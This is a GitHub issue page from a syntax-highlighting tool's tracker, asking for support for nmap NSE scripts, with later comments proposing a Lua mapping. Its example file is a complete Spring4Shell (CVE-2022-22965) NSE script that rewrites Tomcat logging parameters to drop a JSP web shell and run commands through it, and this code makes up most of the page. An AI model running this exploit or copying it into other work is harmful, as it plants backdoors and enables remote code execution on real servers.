Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

add syntax highlighting support for nmap NSE script #2151

Closed
NRGLine4Sec opened this issue Apr 8, 2022 · 3 comments · Fixed by #2214
Closed

add syntax highlighting support for nmap NSE script #2151

NRGLine4Sec opened this issue Apr 8, 2022 · 3 comments · Fixed by #2214
Labels
good first issue Good for newcomers syntax-request

Comments

@NRGLine4Sec
Copy link

here is an exemple for the spring4shell.nse script :

description = [[
  Spring4Shell
  
  CVE-2022-22965
]]

---
-- @usage
-- 
-- @output
--
-- @args
--
---

local http = require "http"
local string = require "string"
local table = require "table"
local stdnse = require "stdnse"
local shortport = require "shortport"
local vulns = require "vulns"

author = "Grzegorz Piechnik <bugspace DOT com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"default", "vuln", "safe", "spring4shell"}

-- We are only interested in http requests
portrule = shortport.http

action = function(host, port)

  -- The buln definition section
  local vuln = {
      title = "Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+",
      state = vulns.STATE.NOT_VULN, --default
      IDS = { CVE = 'CVE-2022-22965' }
  } 

  local report = vulns.Report:new(SCRIPT_NAME, host, port)

  -- Local variables
  local endpoint = stdnse.get_script_args(SCRIPT_NAME .. '.endpoint') or ''
  local command =  stdnse.get_script_args(SCRIPT_NAME .. '.command') or 'id'
  local assertion =  stdnse.get_script_args(SCRIPT_NAME .. '.assertion') or 'uid'
  local filename =  stdnse.get_script_args(SCRIPT_NAME .. '.filename') or 'shell'

  if command ~= 'id' and assertion == 'uid' then
    return("ERROR: To use a 'command' argument, also define an 'assertion' argument.")
  end

  if command == 'id' and assertion ~= 'uid' then
    return("ERROR: To use a 'assertion' argument, also define an 'command' argument.")
  end

  local post_headers = {
    ["content-type"] = "application/x-www-form-urlencoded"
  }

  local get_headers = {
      ["prefix"] = "<%",
      ["suffix"] = "%>//",
      ["c"] = "Runtime",
      ["c1"] = "Runtime",
      ["c2"] = "Runtime",
      ["dnt"] = "1",
      ["content-type"] = "application/x-www-form-urlencoded"
  }

  local log_pattern = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
  local log_file_suffix = "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
  local log_file_dir = "class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
  local log_file_prefix = "class.module.classLoader.resources.context.parent.pipeline.first.prefix=" .. filename
  local log_file_date_format  = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
  local file_date_data = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_"
  local payload = log_pattern .. log_file_suffix .. log_file_dir .. log_file_prefix .. log_file_date_format
  local second_payload = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=" .. filename .. "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="

  if shortport.http(host, port) then
    -- First POST request
    stdnse.debug("First post request")
    local response = http.generic_request(host, port.number, "POST", endpoint, { header = post_headers, content = file_date_data, no_cache = true })

    -- Change the tomcat log location variables --
    stdnse.debug("Change the tomcat log location variables")
    local response = http.generic_request(host, port.number, "POST", endpoint, { header = post_headers, content = payload, no_cache = true })
    stdnse.sleep(3)

    -- Write the web shell --
    stdnse.debug("Write the web shell")
    local response = http.generic_request(host, port.number, "GET", endpoint, { header = get_headers, no_cache = true })
    stdnse.sleep(1)

    -- Reset the pattern
    stdnse.debug("Reset the pattern")
    local pattern_data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
    local response = http.generic_request(host, port.number, "POST", endpoint, { header = post_headers, content = pattern_data, no_cache = true })

    -- Send second payload
    stdnse.debug("Send second payload")
    local response = http.generic_request(host, port.number, "POST", endpoint, { header = post_headers, content = second_payload, no_cache = true })

    -- Verify that RCE is working on the server
    stdnse.debug("Verify that RCE is working on the server")
    local response = http.generic_request(host, port.number, "GET", endpoint .. "/" .. filename .. ".jsp?pwd=j&cmd=" .. command, { header = get_headers, content = pattern_data, no_cache = true })
    local response_body = response.body
    local status = response.status

    if status == nil then
      -- Something went really wrong out there
      -- According to the NSE way we will die silently rather than spam user with error messages
      vuln.extra_info = "URL: " .. host.ip .. ":" .. port.number .. endpoint
    else
      if status ~= 404 then
        if string.find(response_body, assertion) then
          vuln.state = vulns.STATE.VULN
        else
          vuln.state = vulns.STATE.LIKELY_VULN
        end
        vuln.check_results = host.ip .. ":" .. port.number .. "/" .. filename .. ".jsp?pwd=j&cmd=" .. command
        vuln.extra_info = "TESTED URL: " .. host.ip .. ":" .. port.number .. endpoint .. "\n" .. "    COMMAND: " .. command .. "\n" .. "    ASSERTION: " .. assertion
      else
        vuln.extra_info = "TESTED URL: " .. host.ip .. ":" .. port.number .. endpoint .. "\n" .. "    COMMAND: " .. command .. "\n" .. "    ASSERTION: " .. assertion
      end
    end

    return report:make_output(vuln)
    end
end
@NRGLine4Sec NRGLine4Sec added the feature-request New feature or request label Apr 8, 2022
@SuperSandro2000
Copy link

That file extensions can simple be mapped to lua.

@keith-hall keith-hall added syntax-request and removed feature-request New feature or request labels Apr 8, 2022
@sharkdp sharkdp added the good first issue Good for newcomers label May 22, 2022
@Cre3per
Copy link
Contributor

Cre3per commented Jun 4, 2022

Hi! I'd like to work on this issue.
Can we reuse the lua test file for NSE tests? It doesn't require a license

Until this is resolved, users can map nse to lua on the command line bat -m '*.nse:Lua' spring4shell.nse

Cre3per pushed a commit to Cre3per/bat-syntax-nse that referenced this issue Jun 4, 2022
map nse to lua, sharkdp#2151
7558817
Cre3per pushed a commit to Cre3per/bat-syntax-nse that referenced this issue Jun 4, 2022
uncomment nse->lua mapping after testing, sharkdp#2151
27a6b5f
@Cre3per Cre3per mentioned this issue Jun 4, 2022
Merged
@sharkdp
Copy link
Owner

sharkdp commented Jun 4, 2022

Until this is resolved, users can map nse to lua on the command line bat -m '*.nse:Lua' spring4shell.nse

or add

--map-syntax '*.nse:Lua'

to their config file.

Cre3per pushed a commit to Cre3per/bat-syntax-nse that referenced this issue Jun 4, 2022
run cargo fmt, sharkdp#2151
a94e2ae
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
good first issue Good for newcomers syntax-request
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Add syntax mapping from NSE to Lua Cre3per/bat-syntax-nse
5 participants
@sharkdp @SuperSandro2000 @keith-hall @Cre3per @NRGLine4Sec